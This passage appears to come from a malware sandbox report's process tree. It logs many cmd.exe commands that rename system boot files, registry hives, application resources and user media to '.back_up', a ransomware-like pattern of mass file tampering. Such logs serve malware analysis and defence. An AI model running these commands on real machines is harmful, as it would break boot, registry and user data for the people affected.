cmd.exe /c move """C:\\Program Files\PingGroup.htm""" """C:\\Program Files\PingGroup.htm.back_up"""
4⤵
PID:5088

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\ReadStop.eprtx""" """C:\\Program Files\ReadStop.eprtx.back_up"""
4⤵
PID:5080

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\ReceiveFormat.M2V""" """C:\\Program Files\ReceiveFormat.M2V.back_up"""
4⤵
PID:4016

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.back_up"""
4⤵
PID:1308

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\cy.txt""" """C:\\Program Files\7-Zip\Lang\cy.txt.back_up"""
4⤵
PID:3708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab.back_up"""
4⤵
PID:3136

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\cs.txt""" """C:\\Program Files\7-Zip\Lang\cs.txt.back_up"""
4⤵
PID:2200

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\RegisterConfirm.M2V""" """C:\\Program Files\RegisterConfirm.M2V.back_up"""
4⤵
PID:1516

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log""" """C:\\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice-install.log.back_up"""
4⤵
PID:4192

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.back_up"""
4⤵
PID:4380

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest.back_up"""
4⤵
PID:1660

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\da.txt""" """C:\\Program Files\7-Zip\Lang\da.txt.back_up"""
4⤵
PID:1176

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\de.txt""" """C:\\Program Files\7-Zip\Lang\de.txt.back_up"""
4⤵
PID:2292

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft OneDrive\setup\refcount.ini""" """C:\\ProgramData\Microsoft OneDrive\setup\refcount.ini.back_up"""
4⤵
PID:4248

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\el.txt""" """C:\\Program Files\7-Zip\Lang\el.txt.back_up"""
4⤵
PID:4492

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini""" """C:\\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini.back_up"""
4⤵
PID:264

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\fr-CA\bootmgr.exe.mui""" """C:\\Boot\fr-CA\bootmgr.exe.mui.back_up"""
4⤵
PID:4252

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\hr-HR\bootmgr.exe.mui""" """C:\\Boot\hr-HR\bootmgr.exe.mui.back_up"""
4⤵
PID:4464

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ApproveMove.mp3""" """C:\\Users\Admin\Music\ApproveMove.mp3.back_up"""
4⤵
PID:4564

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\chs_boot.ttf""" """C:\\Boot\Fonts\chs_boot.ttf.back_up"""
4⤵
PID:4196

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\en-GB\bootmgr.exe.mui""" """C:\\Boot\en-GB\bootmgr.exe.mui.back_up"""
4⤵
PID:4672

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\hu-HU\bootmgr.exe.mui""" """C:\\Boot\hu-HU\bootmgr.exe.mui.back_up"""
4⤵
PID:4456

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\en.ttt""" """C:\\Program Files\7-Zip\Lang\en.ttt.back_up"""
4⤵
PID:4556

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\hu-HU\memtest.exe.mui""" """C:\\Boot\hu-HU\memtest.exe.mui.back_up"""
4⤵
PID:4780

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\RestartConvertTo.pptm""" """C:\\Program Files\RestartConvertTo.pptm.back_up"""
4⤵
PID:4500

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\RestoreConnect.pcx""" """C:\\Program Files\RestoreConnect.pcx.back_up"""
4⤵
PID:4680

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf.back_up"""
4⤵
PID:4812

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\es.txt""" """C:\\Program Files\7-Zip\Lang\es.txt.back_up"""
4⤵
PID:4396

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\cht_boot.ttf""" """C:\\Boot\Fonts\cht_boot.ttf.back_up"""
4⤵
PID:4576

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\eo.txt""" """C:\\Program Files\7-Zip\Lang\eo.txt.back_up"""
4⤵
PID:4664

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\jpn_boot.ttf""" """C:\\Boot\Fonts\jpn_boot.ttf.back_up"""
4⤵
PID:4816

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ApproveSave.odt""" """C:\\Users\Admin\Music\ApproveSave.odt.back_up"""
4⤵
PID:4712

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\kor_boot.ttf""" """C:\\Boot\Fonts\kor_boot.ttf.back_up"""
4⤵
PID:4652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.back_up"""
4⤵
PID:4980

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Common Files\Services\verisign.bmp""" """C:\\Program Files\Common Files\Services\verisign.bmp.back_up"""
4⤵
PID:4972

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\et.txt""" """C:\\Program Files\7-Zip\Lang\et.txt.back_up"""
4⤵
PID:4928

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\SearchSync.midi""" """C:\\Program Files\SearchSync.midi.back_up"""
4⤵
PID:4844

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-BoldOblique.otf.back_up"""
4⤵
PID:5068

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\eu.txt""" """C:\\Program Files\7-Zip\Lang\eu.txt.back_up"""
4⤵
PID:272

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Oblique.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Oblique.otf.back_up"""
4⤵
PID:5100

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\malgunn_boot.ttf""" """C:\\Boot\Fonts\malgunn_boot.ttf.back_up"""
4⤵
PID:4220

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\CloseInstall.mht""" """C:\\Users\Admin\Music\CloseInstall.mht.back_up"""
4⤵
PID:1632

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ext.txt""" """C:\\Program Files\7-Zip\Lang\ext.txt.back_up"""
4⤵
PID:3520

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini.back_up"""
4⤵
PID:4352

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\fa.txt""" """C:\\Program Files\7-Zip\Lang\fa.txt.back_up"""
4⤵
PID:2652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\SkipStep.dotx""" """C:\\Program Files\SkipStep.dotx.back_up"""
4⤵
PID:3136

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf.back_up"""
4⤵
PID:3708

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\malgun_boot.ttf""" """C:\\Boot\Fonts\malgun_boot.ttf.back_up"""
4⤵
PID:3168

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ConnectSelect.cr2""" """C:\\Users\Admin\Music\ConnectSelect.cr2.back_up"""
4⤵
PID:4640

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\it-IT\bootmgr.exe.mui""" """C:\\Boot\it-IT\bootmgr.exe.mui.back_up"""
4⤵
PID:264

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\fi.txt""" """C:\\Program Files\7-Zip\Lang\fi.txt.back_up"""
4⤵
PID:4256

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\meiryon_boot.ttf""" """C:\\Boot\Fonts\meiryon_boot.ttf.back_up"""
4⤵
PID:4696

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi""" """C:\\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi.back_up"""
4⤵
PID:4112

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\fr.txt""" """C:\\Program Files\7-Zip\Lang\fr.txt.back_up"""
4⤵
PID:1176

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf.back_up"""
4⤵
PID:4592

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\updaterevokesipolicy.p7b""" """C:\\Boot\updaterevokesipolicy.p7b.back_up"""
4⤵
PID:4452

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\SplitEnter.7z""" """C:\\Program Files\SplitEnter.7z.back_up"""
4⤵
PID:4440

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_CostDeferred.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_CostDeferred.rbs.back_up"""
4⤵
PID:3848

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\SplitDisconnect.rtf""" """C:\\Program Files\SplitDisconnect.rtf.back_up"""
4⤵
PID:4364

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\it-IT\memtest.exe.mui""" """C:\\Boot\it-IT\memtest.exe.mui.back_up"""
4⤵
PID:4664

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\SelectReceive.xlt""" """C:\\Program Files\SelectReceive.xlt.back_up"""
4⤵
PID:4764

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_NormalCritical.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_NormalCritical.rbs.back_up"""
4⤵
PID:4896

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\fur.txt""" """C:\\Program Files\7-Zip\Lang\fur.txt.back_up"""
4⤵
PID:4356

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\CompareDismount.mp3""" """C:\\Users\Admin\Music\CompareDismount.mp3.back_up"""
4⤵
PID:4208

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ConvertFromUse.pdf""" """C:\\Users\Admin\Music\ConvertFromUse.pdf.back_up"""
4⤵
PID:5028

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf.back_up"""
4⤵
PID:4844

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_Realtime.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_Realtime.rbs.back_up"""
4⤵
PID:5004

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-BoldIt.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-BoldIt.otf.back_up"""
4⤵
PID:5104

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ConvertToGet.mov""" """C:\\Users\Admin\Music\ConvertToGet.mov.back_up"""
4⤵
PID:4952

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\msjhn_boot.ttf""" """C:\\Boot\Fonts\msjhn_boot.ttf.back_up"""
4⤵
PID:272

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf.back_up"""
4⤵
PID:4756

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\SwitchBackup.i64""" """C:\\Program Files\SwitchBackup.i64.back_up"""
4⤵
PID:1236

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Default\NTUSER.DAT.LOG2""" """C:\\Users\Default\NTUSER.DAT.LOG2.back_up"""
4⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Default\NTUSER.DAT""" """C:\\Users\Default\NTUSER.DAT.back_up"""
4⤵
PID:4352

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\TraceResume.DVR-MS""" """C:\\Program Files\TraceResume.DVR-MS.back_up"""
4⤵
PID:4388

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\SwitchReset.MOD""" """C:\\Program Files\SwitchReset.MOD.back_up"""
4⤵
PID:3520

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\fy.txt""" """C:\\Program Files\7-Zip\Lang\fy.txt.back_up"""
4⤵
PID:4508

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Default\NTUSER.DAT.LOG1""" """C:\\Users\Default\NTUSER.DAT.LOG1.back_up"""
4⤵
PID:3136

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\ConvertToResume.jpeg""" """C:\\Users\Admin\Music\ConvertToResume.jpeg.back_up"""
4⤵
PID:4160

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\meiryo_boot.ttf""" """C:\\Boot\Fonts\meiryo_boot.ttf.back_up"""
4⤵
PID:4808

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\gl.txt""" """C:\\Program Files\7-Zip\Lang\gl.txt.back_up"""
4⤵
PID:3476

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\ga.txt""" """C:\\Program Files\7-Zip\Lang\ga.txt.back_up"""
4⤵
PID:4180

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf.back_up"""
4⤵
PID:4256

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""" """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.back_up"""
4⤵
PID:1716

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""" """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.back_up"""
4⤵
PID:4416

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\UnpublishDebug.mid""" """C:\\Program Files\UnpublishDebug.mid.back_up"""
4⤵
PID:4676

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\msjh_boot.ttf""" """C:\\Boot\Fonts\msjh_boot.ttf.back_up"""
4⤵
PID:1724

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\gu.txt""" """C:\\Program Files\7-Zip\Lang\gu.txt.back_up"""
4⤵
PID:4440

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\osver.txt""" """C:\\ProgramData\Microsoft\Diagnosis\osver.txt.back_up"""
4⤵
PID:4312

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_Normal.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_Normal.rbs.back_up"""
4⤵
PID:5112

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\desktop.ini""" """C:\\Users\Admin\Music\desktop.ini.back_up"""
4⤵
PID:3160

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-BoldIt.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-BoldIt.otf.back_up"""
4⤵
PID:4980

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms""" """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.back_up"""
4⤵
PID:5092

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\he.txt""" """C:\\Program Files\7-Zip\Lang\he.txt.back_up"""
4⤵
PID:5056

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp""" """C:\\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp.back_up"""
4⤵
PID:1152

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\msyhn_boot.ttf""" """C:\\Boot\Fonts\msyhn_boot.ttf.back_up"""
4⤵
PID:5000

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\DisconnectStop.7z""" """C:\\Users\Admin\Music\DisconnectStop.7z.back_up"""
4⤵
PID:4952

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\hi.txt""" """C:\\Program Files\7-Zip\Lang\hi.txt.back_up"""
4⤵
PID:4288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\parse.dat""" """C:\\ProgramData\Microsoft\Diagnosis\parse.dat.back_up"""
4⤵
PID:4884

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\segmono_boot.ttf""" """C:\\Boot\Fonts\segmono_boot.ttf.back_up"""
4⤵
PID:4928

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\msyh_boot.ttf""" """C:\\Boot\Fonts\msyh_boot.ttf.back_up"""
4⤵
PID:4968

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\EnableSet.pps""" """C:\\Users\Admin\Music\EnableSet.pps.back_up"""
4⤵
PID:4016

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-It.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-It.otf.back_up"""
4⤵
PID:5072

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\hr.txt""" """C:\\Program Files\7-Zip\Lang\hr.txt.back_up"""
4⤵
PID:4104

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\segoen_slboot.ttf""" """C:\\Boot\Fonts\segoen_slboot.ttf.back_up"""
4⤵
PID:1792

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\WaitUnpublish.txt""" """C:\\Program Files\WaitUnpublish.txt.back_up"""
4⤵
PID:4896

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\lv-LV\bootmgr.exe.mui""" """C:\\Boot\lv-LV\bootmgr.exe.mui.back_up"""
4⤵
PID:4156

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\hu.txt""" """C:\\Program Files\7-Zip\Lang\hu.txt.back_up"""
4⤵
PID:4264

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Regular.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Regular.otf.back_up"""
4⤵
PID:4680

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\FindInitialize.jpeg""" """C:\\Users\Admin\Music\FindInitialize.jpeg.back_up"""
4⤵
PID:4196

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\segoe_slboot.ttf""" """C:\\Boot\Fonts\segoe_slboot.ttf.back_up"""
4⤵
PID:4144

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\WatchImport.7z""" """C:\\Program Files\WatchImport.7z.back_up"""
4⤵
PID:4228

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\FindMount.emz""" """C:\\Users\Admin\Music\FindMount.emz.back_up"""
4⤵
PID:4980

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\nb-NO\bootmgr.exe.mui""" """C:\\Boot\nb-NO\bootmgr.exe.mui.back_up"""
4⤵
PID:4344

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\nl-NL\bootmgr.exe.mui""" """C:\\Boot\nl-NL\bootmgr.exe.mui.back_up"""
4⤵
PID:4768

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Microsoft Office\AppXManifest.xml""" """C:\\Program Files\Microsoft Office\AppXManifest.xml.back_up"""
4⤵
PID:5104

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\fi-FI\bootmgr.exe.mui""" """C:\\Boot\fi-FI\bootmgr.exe.mui.back_up"""
4⤵
PID:4192

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\OneDrive\desktop.ini""" """C:\\Users\Admin\OneDrive\desktop.ini.back_up"""
4⤵
PID:4288

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Desktop\AssertRename.midi""" """C:\\Users\Admin\Desktop\AssertRename.midi.back_up"""
4⤵
PID:4884

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\7-Zip\Lang\hy.txt""" """C:\\Program Files\7-Zip\Lang\hy.txt.back_up"""
4⤵
PID:3968

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\Office\ClickToRunPackageLocker""" """C:\\ProgramData\Microsoft\Office\ClickToRunPackageLocker.back_up"""
4⤵
PID:2448

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Mozilla Firefox\Accessible.tlb""" """C:\\Program Files\Mozilla Firefox\Accessible.tlb.back_up"""
4⤵
PID:4016

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\pt-BR\bootmgr.exe.mui""" """C:\\Boot\pt-BR\bootmgr.exe.mui.back_up"""
4⤵
PID:2724

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Pictures\AddRegister.dib""" """C:\\Users\Admin\Pictures\AddRegister.dib.back_up"""
4⤵
PID:3372

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Documents\AddUninstall.xps""" """C:\\Users\Admin\Documents\AddUninstall.xps.back_up"""
4⤵
PID:4236

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm""" """C:\\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm.back_up"""
4⤵
PID:2224

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\Fonts\wgl4_boot.ttf""" """C:\\Boot\Fonts\wgl4_boot.ttf.back_up"""
4⤵
PID:1036

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.back_up"""
4⤵
PID:4264

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\nb-NO\memtest.exe.mui""" """C:\\Boot\nb-NO\memtest.exe.mui.back_up"""
4⤵
PID:4996

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Music\FindRequest.cr2""" """C:\\Users\Admin\Music\FindRequest.cr2.back_up"""
4⤵
PID:4248

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Users\Admin\Favorites\Bing.url""" """C:\\Users\Admin\Favorites\Bing.url.back_up"""
4⤵
PID:4144

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files\Microsoft Office\FileSystemMetadata.xml""" """C:\\Program Files\Microsoft Office\FileSystemMetadata.xml.back_up"""
4⤵
PID:4652

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Boot\fi-FI\memtest.exe.mui""" """C:\\Boot\fi-FI\memtest.exe.mui.back_up"""
4⤵
PID:4344

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\Admin.dat""" """C:\\ProgramData\Microsoft\User Account Pictures\Admin.dat.back_up"""
4⤵
PID:4768

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c move """C:\\Program Files (x86)\Common Files\Services\verisign.bmp""" """C:\\Program Files (x86)\Common Files\Services\verisign.bmp.back_up"""
4⤵
PID:4608

C:\Windows\SYSTEM32\cmd.exe
